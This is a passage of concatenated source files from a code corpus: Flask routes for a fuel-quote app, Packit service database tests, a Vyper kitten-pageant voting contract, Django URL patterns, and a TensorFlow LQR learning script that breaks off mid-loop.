Unsuccessful. Please check username and password\", 'danger')\n return redirect(url_for('home'))\n return render_template('home.html',form=form)\n\n@app.route('/logout')\ndef logout():\n logout_user()\n flash('You have been logged out!', 'danger') \n return redirect(url_for('home'))\n\n@app.route('/register', methods=[\"GET\", \"POST\"])\ndef register():\n #if request.method == \"POST\":\n #user = request.form.get(\"username\")\n #return user\n if current_user.is_authenticated:\n return redirect(url_for('Management'))\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n user = User(username=form.username.data, password=hashed_password)\n db.session.add(user)\n db.session.commit()\n flash(f'Account created for {form.username.data}! 
You can now login','success')\n return redirect(url_for('home'))\n return render_template('register_user.html',form=form)\n\n\n@app.route(\"/fuelQuote\", methods=['GET', 'POST'])\ndef fuelQuote():\n \n form = FuelQuoteForm()\n registered_user = Registered_user.query.filter_by(user_id=userid).first() #TO GET ADDRESSES\n if registered_user is None: # If Not registered, itll redirect user to register,if quote form button clicked\n flash(f'You Need To Register First!', 'danger')\n return redirect(url_for('Management'))\n\n \n form.delivery_address.data = registered_user.address1 # Insert Address INTO READONLY FORMFIELD\n if form.validate_on_submit(): #PRICE MODULE\n if form.get_quote.data:\n r_user = Registered_user.query.filter_by(user_id=userid).first()\n print('yes')\n if r_user.state == \"TX\":\n location_factor = .02\n else:\n location_factor= .04\n #fuel history (.01 if history, 0 otherwise) QUERY FOR THIS\n fuel_user = Fuel_quote.query.filter_by(user_id=userid).all()\n if len(fuel_user) >= 1:\n history_factor = .01\n else:\n history_factor = 0\n \n #gallons requested (.02 > 1000, .03 if less)\n gals = request.form['gallons_requested']\n gals = int(gals)\n if gals > 1000:\n gals_factor = .02\n else:\n gals_factor = .03\n #static company profit (.1)\n company_profit = .1\n\n margin = (location_factor-history_factor+gals_factor+company_profit) * 1.5\n suggested_price_per_gal = margin+1.50\n total = gals*suggested_price_per_gal\n form.total.data = total\n print(total)\n return render_template('fuelQuote.html', form=form, price=suggested_price_per_gal, total=total)\n\n elif form.submit.data:\n clientquote = Fuel_quote.query.filter_by(user_id=userid).first()\n quote = Fuel_quote(number_of_gallons=form.gallons_requested.data, delivery_address = registered_user.address1 +\" \"+ registered_user.address2,\n delivery_date = form.delivery_date.data, price_per_gallon = form.price.data, total = form.total.data, user_id = userid)#using global userid\n db.session.add(quote)\n db.session.commit()\n print('Hello')\n flash(f'Quote Received Successfully!', 'success')\n return redirect(url_for('fuelQuote'))\n\n return render_template('fuelQuote.html', form=form)\n\n@app.route(\"/history\")\ndef history():\n registered_user = Fuel_quote.query.filter_by(user_id=userid).all()\n \n return render_template('history.html',quote=registered_user)\n\n@app.route(\"/Registration\",methods=[\"GET\", \"POST\"])\ndef Registration():\n form = RegisterForm()\n registered_user = Registered_user.query.filter_by(user_id=userid).first()\n if registered_user is not None:\n form.fullname.data = registered_user.fullname\n form.address1.data = registered_user.address1\n form.address2.data = registered_user.address2\n form.city.data = registered_user.city\n form.state.data = registered_user.state\n form.zipcode.data = registered_user.zipcode\n if form.validate_on_submit():\n if registered_user is None:\n registered_user = Registered_user(user_id=userid, fullname=form.fullname.data, address1=form.address1.data, address2=form.address2.data, city=form.city.data, state=form.state.data, zipcode=form.zipcode.data)\n db.session.add(registered_user)\n db.session.commit()\n else:\n registered_user.fullname = form.fullname.data\n registered_user.address1 = form.address1.data\n registered_user.address2 = form.address2.data\n registered_user.city = form.city.data\n registered_user.state = form.state.data\n registered_user.zipcode = form.zipcode.data\n db.session.commit()\n flash(f'Information registered','success')\n return 
redirect(url_for('Management'))\n return render_template('Registration.html', form=form)\n \n\n@app.route(\"/Management\", methods=[\"GET\", \"POST\"])\ndef Management():\n\n registered_user = Registered_user.query.filter_by(user_id=userid).first()\n print(userid)\n table_values=registered_user\n if table_values is None:\n data = (\n ('', '', '', '', '', '')\n )\n else:\n data = (\n (table_values.fullname, table_values.address1, table_values.address2, table_values.city, table_values.state, table_values.zipcode)\n )\n\n\n\n return render_template('Management.html', data=data)\n","sub_path":"webapp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"229331181","text":"# MIT License\n#\n# Copyright (c) 2018-2020 Red Hat, Inc.\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\"\"\"\nThese tests require a psql database with a schema:\n```\nexport POSTGRESQL_USER=packit\nexport POSTGRESQL_PASSWORD=secret-password\nexport POSTGRESQL_DATABASE=packit\nexport POSTGRESQL_SERVICE_HOST=0.0.0.0\n$ docker-compose -d postgres\n$ alembic upgrade head\n```\n\"\"\"\nfrom datetime import datetime, timedelta\n\nimport pytest\nfrom sqlalchemy.exc import ProgrammingError\n\nfrom packit_service.models import (\n CoprBuild,\n get_sa_session,\n SRPMBuild,\n PullRequest,\n GitProject,\n Whitelist,\n TaskResultModel,\n)\n\nTARGET = \"fedora-42-x86_64\"\n\n\ndef clean_db():\n with get_sa_session() as session:\n session.query(CoprBuild).delete()\n session.query(PullRequest).delete()\n session.query(GitProject).delete()\n session.query(Whitelist).delete()\n session.query(TaskResultModel).delete()\n\n\n# Create a single build\n@pytest.fixture()\ndef a_copr_build():\n with get_sa_session() as session:\n session.query(CoprBuild).delete()\n srpm_build = SRPMBuild.create(\"asd\\nqwe\\n\")\n yield CoprBuild.get_or_create(\n pr_id=1,\n build_id=\"123456\",\n commit_sha=\"687abc76d67d\",\n repo_name=\"lithium\",\n namespace=\"nirvana\",\n project_name=\"SomeUser-hello-world-9\",\n owner=\"packit\",\n web_url=\"https://copr.something.somewhere/123456\",\n target=TARGET,\n status=\"pending\",\n srpm_build=srpm_build,\n )\n clean_db()\n\n\n# Create multiple builds\n# Used for testing querys\n@pytest.fixture()\ndef multiple_copr_builds():\n with get_sa_session() as session:\n session.query(CoprBuild).delete()\n srpm_build = SRPMBuild.create(\"asd\\nqwe\\n\")\n yield [\n 
CoprBuild.get_or_create(\n pr_id=1,\n build_id=\"123456\",\n commit_sha=\"687abc76d67d\",\n repo_name=\"lithium\",\n namespace=\"nirvana\",\n project_name=\"SomeUser-hello-world-9\",\n owner=\"packit\",\n web_url=\"https://copr.something.somewhere/123456\",\n target=\"fedora-42-x86_64\",\n status=\"pending\",\n srpm_build=srpm_build,\n ),\n # Same build_id but different chroot\n CoprBuild.get_or_create(\n pr_id=1,\n build_id=\"123456\",\n commit_sha=\"687abc76d67d\",\n repo_name=\"lithium\",\n namespace=\"nirvana\",\n project_name=\"SomeUser-hello-world-9\",\n owner=\"packit\",\n web_url=\"https://copr.something.somewhere/123456\",\n target=\"fedora-43-x86_64\",\n status=\"pending\",\n srpm_build=srpm_build,\n ),\n # Completely different build\n CoprBuild.get_or_create(\n pr_id=4,\n build_id=\"987654\",\n commit_sha=\"987def76d67e\",\n repo_name=\"cockpit-project\",\n namespace=\"cockpit\",\n project_name=\"SomeUser-random-text-7\",\n owner=\"cockpit-project\",\n web_url=\"https://copr.something.somewhere/987654\",\n target=\"fedora-43-x86_64\",\n status=\"pending\",\n srpm_build=srpm_build,\n ),\n ]\n\n clean_db()\n\n\n# Create multiple whitelist entries\n@pytest.fixture()\ndef multiple_whitelist_entries():\n with get_sa_session() as session:\n session.query(Whitelist).delete()\n yield [\n Whitelist.add_account(account_name=\"Rayquaza\", status=\"approved_manually\"),\n Whitelist.add_account(account_name=\"Deoxys\", status=\"approved_manually\"),\n # Not a typo, account_name repeated intentionally to check behaviour\n Whitelist.add_account(account_name=\"Deoxys\", status=\"waiting\"),\n Whitelist.add_account(account_name=\"Solgaleo\", status=\"waiting\"),\n Whitelist.add_account(account_name=\"Zacian\", status=\"approved_manually\"),\n ]\n clean_db()\n\n\n# Create new whitelist entry\n@pytest.fixture()\ndef new_whitelist_entry():\n with get_sa_session() as session:\n session.query(Whitelist).delete()\n yield Whitelist.add_account(account_name=\"Rayquaza\", status=\"approved_manually\")\n clean_db()\n\n\n@pytest.fixture()\ndef task_results():\n return [\n {\n \"jobs\": {\n \"copr_build\": {\n \"success\": True,\n \"details\": {\n \"msg\": \"Only users with write or admin permissions to the \"\n \"repository can trigger Packit-as-a-Service\"\n },\n }\n },\n \"event\": {\n \"trigger\": \"pull_request\",\n \"created_at\": \"2020-03-26T07:39:18\",\n \"project_url\": \"https://github.com/nmstate/nmstate\",\n \"git_ref\": None,\n \"identifier\": \"934\",\n \"action\": \"synchronize\",\n \"pr_id\": 934,\n \"base_repo_namespace\": \"nmstate\",\n \"base_repo_name\": \"nmstate\",\n \"base_ref\": \"f483003f13f0fee585f5cc0b970f4cd21eca7c9d\",\n \"target_repo\": \"nmstate/nmstate\",\n \"commit_sha\": \"f483003f13f0fee585f5cc0b970f4cd21eca7c9d\",\n \"github_login\": \"adwait-thattey\",\n },\n },\n {\n \"jobs\": {\"tests\": {\"success\": True, \"details\": {}}},\n \"event\": {\n \"trigger\": \"testing_farm_results\",\n \"created_at\": \"2020-03-25T16:56:39\",\n \"project_url\": \"https://github.com/psss/tmt.git\",\n \"git_ref\": \"4c584245ef53062eb15afc7f8daa6433da0a95a7\",\n \"identifier\": \"4c584245ef53062eb15afc7f8daa6433da0a95a7\",\n \"pipeline_id\": \"c9a88c3d-801f-44e4-a206-2e1b6081446a\",\n \"result\": \"passed\",\n \"environment\": \"Fedora-Cloud-Base-30-20200325.0.x86_64.qcow2\",\n \"message\": \"All tests passed\",\n \"log_url\": \"https://console-testing-farm.apps.ci.centos.org/pipeline\"\n \"/c9a88c3d-801f-44e4-a206-2e1b6081446a\",\n \"copr_repo_name\": \"packit/psss-tmt-178\",\n 
\"copr_chroot\": \"fedora-30-x86_64\",\n \"tests\": [\n {\"name\": \"/plans/smoke\", \"result\": \"passed\", \"log_url\": None},\n {\"name\": \"/plans/basic\", \"result\": \"passed\", \"log_url\": None},\n ],\n \"repo_name\": \"tmt\",\n \"repo_namespace\": \"psss\",\n \"commit_sha\": \"4c584245ef53062eb15afc7f8daa6433da0a95a7\",\n },\n },\n ]\n\n\n@pytest.fixture()\ndef multiple_task_results_entries(task_results):\n with get_sa_session() as session:\n session.query(TaskResultModel).delete()\n yield [\n TaskResultModel.add_task_result(\n task_id=\"ab1\", task_result_dict=task_results[0]\n ),\n TaskResultModel.add_task_result(\n task_id=\"ab2\", task_result_dict=task_results[1]\n ),\n ]\n clean_db()\n\n\ndef test_create_copr_build(a_copr_build):\n assert a_copr_build.pr_id == a_copr_build.pr.id\n assert a_copr_build.pr.pr_id == 1\n assert a_copr_build.build_id == \"123456\"\n assert a_copr_build.commit_sha == \"687abc76d67d\"\n assert a_copr_build.pr.project.namespace == \"nirvana\"\n assert a_copr_build.pr.project.repo_name == \"lithium\"\n assert a_copr_build.project_name == \"SomeUser-hello-world-9\"\n assert a_copr_build.owner == \"packit\"\n assert a_copr_build.web_url == \"https://copr.something.somewhere/123456\"\n assert a_copr_build.srpm_build.logs == \"asd\\nqwe\\n\"\n assert a_copr_build.target == TARGET\n assert a_copr_build.status == \"pending\"\n # Since datetime.utcnow() will return different results in every time its called,\n # we will check if a_copr_build has build_submitted_time value thats within the past hour\n time_last_hour = datetime.utcnow() - timedelta(hours=1)\n assert a_copr_build.build_submitted_time > time_last_hour\n\n\ndef test_get_copr_build(a_copr_build):\n assert a_copr_build.id\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.id == a_copr_build.id\n # let's make sure passing int works as well\n b = CoprBuild.get_by_build_id(int(a_copr_build.build_id), TARGET)\n assert b.id == a_copr_build.id\n b2 = CoprBuild.get_by_id(b.id)\n assert b2.id == a_copr_build.id\n\n\ndef test_copr_build_set_status(a_copr_build):\n assert a_copr_build.status == \"pending\"\n a_copr_build.set_status(\"awesome\")\n assert a_copr_build.status == \"awesome\"\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.status == \"awesome\"\n\n\ndef test_copr_build_set_build_logs_url(a_copr_build):\n url = \"https://copr.fp.o/logs/12456/build.log\"\n a_copr_build.set_build_logs_url(url)\n assert a_copr_build.build_logs_url == url\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.build_logs_url == url\n\n\ndef test_get_or_create_pr():\n clean_db()\n with get_sa_session() as session:\n try:\n expected_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"layla\"\n )\n actual_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"layla\"\n )\n\n assert session.query(PullRequest).count() == 1\n assert expected_pr.project_id == actual_pr.project_id\n\n expected_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"cocaine\"\n )\n actual_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"cocaine\"\n )\n\n assert session.query(PullRequest).count() == 2\n assert expected_pr.project_id == actual_pr.project_id\n finally:\n clean_db()\n\n\ndef test_errors_while_doing_db():\n with get_sa_session() as session:\n try:\n try:\n PullRequest.get_or_create(pr_id=\"nope\", namespace=\"\", repo_name=False)\n except ProgrammingError:\n pass\n 
assert len(session.query(PullRequest).all()) == 0\n PullRequest.get_or_create(pr_id=111, namespace=\"asd\", repo_name=\"qwe\")\n assert len(session.query(PullRequest).all()) == 1\n finally:\n clean_db()\n\n\n# return all builds in table\ndef test_get_all(multiple_copr_builds):\n builds_list = CoprBuild.get_all()\n assert len(builds_list) == 3\n # we just wanna check if result is iterable\n # order doesn't matter, so all of them are set to pending in supplied data\n assert builds_list[1].status == \"pending\"\n\n\n# return all builds with given build_id\ndef test_get_all_build_id(multiple_copr_builds):\n builds_list = CoprBuild.get_all_by_build_id(str(123456))\n assert len(list(builds_list)) == 2\n # both should have the same project_name\n assert builds_list[1].project_name == builds_list[0].project_name\n assert builds_list[1].project_name == \"SomeUser-hello-world-9\"\n\n\n# returns the first build with given build id and target\ndef test_get_by_build_id(multiple_copr_builds):\n # these are not iterable and thus should be accessible directly\n build_a = CoprBuild.get_by_build_id(str(123456), \"fedora-42-x86_64\")\n assert build_a.project_name == \"SomeUser-hello-world-9\"\n assert build_a.target == \"fedora-42-x86_64\"\n build_b = CoprBuild.get_by_build_id(str(123456), \"fedora-43-x86_64\")\n assert build_b.project_name == \"SomeUser-hello-world-9\"\n assert build_b.target == \"fedora-43-x86_64\"\n build_c = CoprBuild.get_by_build_id(str(987654), \"fedora-43-x86_64\")\n assert build_c.project_name == \"SomeUser-random-text-7\"\n\n\ndef test_add_account(new_whitelist_entry):\n assert new_whitelist_entry.status == \"approved_manually\"\n assert new_whitelist_entry.account_name == \"Rayquaza\"\n\n\ndef test_get_account(multiple_whitelist_entries):\n assert Whitelist.get_account(\"Rayquaza\").status == \"approved_manually\"\n assert Whitelist.get_account(\"Rayquaza\").account_name == \"Rayquaza\"\n assert Whitelist.get_account(\"Deoxys\").status == \"waiting\"\n assert Whitelist.get_account(\"Deoxys\").account_name == \"Deoxys\"\n assert Whitelist.get_account(\"Solgaleo\").status == \"waiting\"\n assert Whitelist.get_account(\"Solgaleo\").account_name == \"Solgaleo\"\n\n\ndef test_get_accounts_by_status(multiple_whitelist_entries):\n a = Whitelist.get_accounts_by_status(\"waiting\")\n assert len(list(a)) == 2\n b = Whitelist.get_accounts_by_status(\"approved_manually\")\n assert len(list(b)) == 2\n\n\ndef test_remove_account(multiple_whitelist_entries):\n assert Whitelist.get_account(\"Rayquaza\").account_name == \"Rayquaza\"\n Whitelist.remove_account(\"Rayquaza\")\n assert Whitelist.get_account(\"Rayquaza\") is None\n\n\ndef test_get_task_results(multiple_task_results_entries):\n results = TaskResultModel.get_all()\n assert len(results) == 2\n assert results[0].task_id == \"ab1\"\n assert results[1].task_id == \"ab2\"\n\n\ndef test_get_task_result_by_id(multiple_task_results_entries, task_results):\n assert TaskResultModel.get_by_id(\"ab1\").jobs == task_results[0].get(\"jobs\")\n assert TaskResultModel.get_by_id(\"ab1\").event == task_results[0].get(\"event\")\n assert TaskResultModel.get_by_id(\"ab2\").jobs == task_results[1].get(\"jobs\")\n assert TaskResultModel.get_by_id(\"ab2\").event == task_results[1].get(\"event\")\n","sub_path":"tests_requre/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":14665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"508854838","text":"# Kitten Cutie Pageant\n#\n# An 
organizer creates the pageant, with a prize value (wei)\n# Next, they add_kitten() up to max_kitten kittens\n# They can also add_judge() any number of judges\n# Judges can vote() for either kitten\n# The organizer can close() the pageant\n# This sends the prize to the winner\n# ...or divides evenly in the case of a tie\n# ...or returns it to the organizer if there are < max_kitten kittens\n# At any time, anyone can get the index of the winning_kitten()\n# ...or the winner_name()\n# ...or the winner_owner()\n# ...but this is only guaranteed to be the final winner if the pageant is_closed()\n\n# Judges, mapped by address\njudges: public({\n # Has this judge voted yet?\n voted: bool,\n # Index of the kitten voted for\n vote: num\n}[address])\n\n# Kittens, mapped by index (0, 1)\n# Currently limited to 2 kittens\nkittens: public({\n # Short name, 32 bytes\n name: bytes32,\n # URL of kitten, up to 128 bytes\n url: bytes <= 128,\n # Number of votes for this kitten.\n vote_count: num,\n # Is this kitten registered yet?\n registered: bool,\n # Address of the owner of this kitten.\n owner: address\n}[num])\n\norganizer: public(address)\nnum_kittens: public(num)\nmax_kittens: public(num)\n\n# Setup global variables\n@public\ndef __init__():\n self.organizer = msg.sender\n\n self.num_kittens = 0\n self.max_kittens = 2\n\n# Computes the currently winning kitten\n@public\n@constant\ndef winning_kitten() -> num:\n winning_vote_count: num = 0\n winning_kitten: num = -1\n\n for k in range(2):\n if self.kittens[k].vote_count > winning_vote_count:\n winning_vote_count = self.kittens[k].vote_count\n winning_kitten = k\n\n return winning_kitten\n\n# Return the name of the (currently) winner\n@public\n@constant\ndef winner_name() -> bytes32:\n return self.kittens[self.winning_kitten()].name\n\n# Return the owner of the (currently) winner\n@public\n@constant\ndef winner_owner() -> address:\n return self.kittens[self.winning_kitten()].owner\n\n# Return URL of the (current) winner\n@public\n@constant\ndef winner_url() -> bytes <= 128:\n return self.kittens[self.winning_kitten()].url\n\n@public\ndef add_kitten(addr: address, name: bytes32, url: bytes <= 128) -> bytes32:\n # Kittens must be added by the organizer\n assert msg.sender == self.organizer\n # Only max_kittens allowed\n assert self.num_kittens < self.max_kittens\n\n self.kittens[self.num_kittens] = {\n name: name,\n url: url,\n vote_count: 0,\n registered: true,\n owner: addr\n }\n\n self.num_kittens += 1\n\n return name\n\n@public\ndef add_judge(judge: address):\n # Throws if the sender is not the organizer.\n assert msg.sender == self.organizer\n\n self.judges[judge] = {\n voted: false,\n vote: -1\n }\n\n@public\ndef vote(kitten: num):\n # Can't vote twice\n # Also, can't vote if not a judge\n assert not self.judges[msg.sender].voted\n # Can only vote on a registered kitten\n assert self.kittens[kitten].registered\n\n self.judges[msg.sender].vote = kitten\n self.judges[msg.sender].voted = true\n self.kittens[kitten].vote_count += 1\n","sub_path":"etherkitten/pageant.v.py","file_name":"pageant.v.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"618742408","text":"from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('',\n # url(r'(\\d+)/getKwarg', 'userProfile.views.userAddFilm'),\n url(r'm=(?P\\d+)&(?P\\d+)', 'userProfile.views.readMassages'),\n url(r'FriendIsTrue=(?P\\d+)', 'userProfile.views.freindsIsTrue'),\n 
url(r'friendsNotMyApplic', 'userProfile.views.userFriendNotMyApplic'),\n url(r'friendsMyApplic', 'userProfile.views.userFriendMyApplic'),\n url(r'(\\d+)/friends', 'userProfile.views.userFriendView'),\n url(r'(\\d+)/addfilms', 'userProfile.views.userAddFilm'),\n url(r'(\\d+)/lookfilms', 'userProfile.views.userLooks'),\n url(r'(\\d+)/likefilms', 'userProfile.views.userLikes'),\n url(r'(\\d+)/edit', 'userProfile.views.editUserProfile'),\n url(r'(\\d+)', 'userProfile.views.gUserProfile'),\n url(r'^logout', 'userProfile.views.logout'),\n url(r'^info', 'userProfile.views.userIndex'),\n # url(r'^blog/', include('blog.urls')),\n\n\n)\n\n\n","sub_path":"userProfile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"298602047","text":"import numpy as np\nimport cvxpy as cp\nimport tensorflow as tf\nfrom cvxpylayers.tensorflow.cvxpylayer import CvxpyLayer\nnp.seterr(all='raise')\nimport scipy.linalg \nimport matplotlib\n# matplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport ipdb\nfrom scipy.linalg import sqrtm\nfrom tqdm import trange\n# from time import gmtime, strftime\nimport datetime, os\n\ngpus = tf.config.experimental.list_physical_devices('GPU')\nif gpus:\n # Restrict TensorFlow to only use the first GPU\n try:\n tf.config.experimental.set_visible_devices([], 'GPU')\n tf.config.experimental.set_virtual_device_configuration(\n gpus[0],\n [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=5120)])\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\")\n except RuntimeError as e:\n # Visible devices must be set before GPUs have been initialized\n print(e)\n\n# # Set CPU as available physical device\n# cpus = tf.config.experimental.list_physical_devices(device_type='CPU')\n# tf.config.experimental.set_visible_devices(devices= cpus, device_type='CPU')\n\ndef LQR_tf(A_tf, B_tf, Qtrain_tf, Rtrain_tf, T, n):\n Ptp1 = tf.identity(tf.linalg.diag(Qtrain_tf))\n K = []\n # Backward ricatti\n for t in range(T):\n Kt = -tf.linalg.inv(tf.linalg.diag(Rtrain_tf) + tf.transpose(B_tf)@Ptp1@B_tf)@tf.transpose(B_tf)@Ptp1@A_tf\n Pt = tf.linalg.diag(Qtrain_tf) + tf.transpose(A_tf)@tf.linalg.inv(tf.eye(n, dtype=tf.dtypes.float64) + Ptp1@B_tf@tf.linalg.inv(tf.linalg.diag(Rtrain_tf))@tf.transpose(B_tf))@Ptp1@A_tf\n Ptp1 = tf.identity(Pt)\n K.append(Kt)\n \n # x = []\n # x.append(x0)\n # u = []\n # for t in range(T):\n # u.append( K[T-1-t]@(x[t]-xf_tf) )\n # x.append( A_tf@x[t] + B_tf@u[t] )\n return K\n\n\ndef evaluate(train_xinit, expert_traj, A_tf, B_tf, K_lqr, xf_tf, T, n, m):\n\n u_star = expert_traj[n:, :]\n x_star = expert_traj[:n, :]\n\n u_sys = []\n x_sys = []\n x_sys.append(train_xinit)\n u_lqr = []\n x_lqr = []\n x_lqr.append(train_xinit)\n for i in range(T):\n u_sys.append( K_lqr[T-1-i]@(tf.expand_dims(expert_traj[:n, i], axis = 1)- xf_tf) )\n u_lqr.append( K_lqr[T-1-i]@(x_lqr[i] - xf_tf) )\n x_lqr.append( A_tf@x_lqr[i] + B_tf@u_lqr[i] )\n x_sys.append( A_tf@tf.expand_dims(x_star[:, i], axis = 1) + B_tf@tf.expand_dims(u_star[:, i], axis = 1) )\n\n u_lqr = tf.concat([tf.concat(u_lqr, axis = 1), tf.zeros((m, 1), dtype=tf.dtypes.float64)], axis = 1)\n u_sys = tf.concat([tf.concat(u_sys, axis = 1), tf.zeros((m, 1), dtype=tf.dtypes.float64)], axis = 1)\n x_lqr = tf.concat(x_lqr, axis = 1)\n x_sys = tf.concat(x_sys, axis = 1)\n\n # cost = tf.reduce_sum( 
tf.square(tf.subtract(x_star, x_lqr))) + tf.reduce_sum( tf.square(tf.subtract(u_star, u_lqr)) )\n # cost = tf.reduce_sum( tf.square(tf.subtract(u_star, u_sys)))\n cost = tf.reduce_sum( tf.square(tf.subtract(u_star, u_sys)))\n cost_sysID = tf.reduce_sum( tf.square(tf.subtract(x_star, x_sys)))\n # cost = cost/(u_star.shape[1])#/(x_star.shape[0])\n # print(tape.gradient(cost, Kt))\n # print(tape.gradient(cost, xf_tf))\n # ipdb.set_trace()\n return cost, cost_sysID\n\ndef eval_loss(train_xinit, expert_trajs, massinv_tf, A_tf, Bpart_tf, Qtrain_tf, xf_tf, Rtrain_tf, T, n, m):\n B_tf = massinv_tf*Bpart_tf\n vel_fG = tf.zeros((int(n/2),1), dtype=tf.dtypes.float64)\n K_lqr = LQR_tf(A_tf, B_tf, Qtrain_tf, Rtrain_tf, T, n)\n N = train_xinit.shape[0]\n outputs = [evaluate(train_xinit[i], expert_trajs[i], A_tf, B_tf, K_lqr, tf.concat([xf_tf, vel_fG], axis=0), T, n, m)\n for i in range(N)]\n loss = sum([out[0] for out in outputs]) / N\n loss_sysID = sum([out[1] for out in outputs]) / N\n return loss, loss_sysID\n\ndef train(train_xinit, expert_trajs, lr, massinv_tf, A_tf, Bpart_tf, Qtrain_tf, xf_tf, Rtrain_tf, T, n, m):\n optimizer = tf.keras.optimizers.Adam(learning_rate=lr, beta_1=0.9, beta_2=0.999, epsilon=1e-04)\n\n variables = [massinv_tf, Qtrain_tf, xf_tf, Rtrain_tf]\n variables_sysID = [massinv_tf]\n # variables = [massinv_tf, Qtrain_tf, Rtrain_tf]\n # variables = [massinv_tf]\n with tf.GradientTape(persistent=True) as tape:\n loss, loss_sysID = eval_loss(train_xinit, expert_trajs, massinv_tf, A_tf, Bpart_tf, Qtrain_tf, xf_tf, Rtrain_tf, T, n, m)\n \n gradients = tape.gradient(loss, variables)\n gradients_sysID = tape.gradient(loss_sysID, variables_sysID)\n\n optimizer.apply_gradients(zip(gradients, variables))\n optimizer.apply_gradients(zip(gradients_sysID, variables_sysID))\n return loss, loss_sysID, variables\n\ndef main():\n n = 2\n m = 1\n T = 100\n dt = 0.1\n mass = 0.5\n n_trajs = 5000\n train_num = n_trajs\n batch_size = 20\n lr = 0.001\n\n x0 = np.array([-1, 0.000001])\n A = np.array([[1, dt],[0,1]])\n B = np.array([[0],[dt/mass]])\n Bpart = np.array([[0],[dt]])\n Q = 2*np.eye(n)\n R = 2*np.eye(m)\n xf = np.array([[2],[0]])\n\n # Learning the LQR model:\n data = np.load('../data/expert_LQR_5000.npz')\n train_xinit = data['xinit']\n expert_trajs = data['expert_trajs']\n train_xinit_tf = tf.constant(train_xinit, dtype=tf.dtypes.float64)\n \n # Initialize training variables\n massinv_tf = tf.Variable( tf.random.uniform([1], minval=0, maxval=2, dtype=tf.dtypes.float64) )\n Qtrain_tf = tf.Variable( tf.random.uniform([n], minval=0, maxval=2, dtype=tf.dtypes.float64) )\n xf_tf = tf.Variable( tf.random.uniform((int(n/2),1), minval=0, maxval=2, dtype=tf.dtypes.float64) )\n Rtrain_tf = tf.Variable( tf.random.uniform([m], minval=0, maxval=2, dtype=tf.dtypes.float64) )\n\n A_tf = tf.constant(A)\n Bpart_tf = tf.Variable(Bpart)\n\n # massinv_tf = tf.Variable( np.array([1/mass]), dtype=tf.dtypes.float64 )\n # Qtrain_tf = tf.Variable( np.diag(Q), dtype=tf.dtypes.float64 )\n # xf_tf = tf.Variable( xf[0,0].reshape(1,1), dtype=tf.dtypes.float64 )\n # Rtrain_tf = tf.Variable( np.diag(R), dtype=tf.dtypes.float64 )\n\n #-------Using self-implementation of LQR-----------------\n # K_lqr = LQR_tf(massinv_tf, A_tf, Bpart_tf, Qtrain_tf, xf_tf, Rtrain_tf, T, n)\n\n \n\n #-----------TRAIN------------------\n train_loss_list = []\n tag = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n checkpoint_path = '../outs/LearnK_LQR_self/' + tag + '/saved_model/'\n plot_dir = '../outs/LearnK_LQR_self/' + tag + 
'/media'\n train_log_dir = '../logs/LearnK_LQR_self/' + tag\n os.makedirs(plot_dir)\n os.makedirs(checkpoint_path)\n checkpoint = tf.train.Checkpoint(massinv_tf=massinv_tf, Qtrain_tf=Qtrain_tf, xf_tf = xf_tf, Rtrain_tf = Rtrain_tf)\n ckpt_manager = tf.train.CheckpointManager(checkpoint, checkpoint_path, max_to_keep=5)\n\n train_summary_writer = tf.summary.create_file_writer(train_log_dir)\n i = 0\n for e in trange(20):\n train_loss = 0\n tf.random.shuffle(train_xinit)\n # lr = lr/(e+1)\n for b in trange(0, train_num, batch_size):\n i+=1\n loss, loss_sysID, variables = train(train_xinit_tf[b:min(b + batch_size, train_num)], expert_trajs[b:min(b + batch_size, train_num)], lr, massinv_tf, A_tf, Bpart_tf, Qtrain_tf, xf_tf, Rtrain_tf, T, n, m)\n massinv_tf.assign(tf.abs(variables[0]))\n Qtrain_tf.assign(tf.abs(variables[1]))\n xf_tf.assign(variables[2])\n Rtrain_tf.assign(tf.abs(variables[3]))\n # print(\"Train BATCH : \", b, \"loss : \", loss)\n train_loss += loss\n with train_summary_writer.as_default():\n 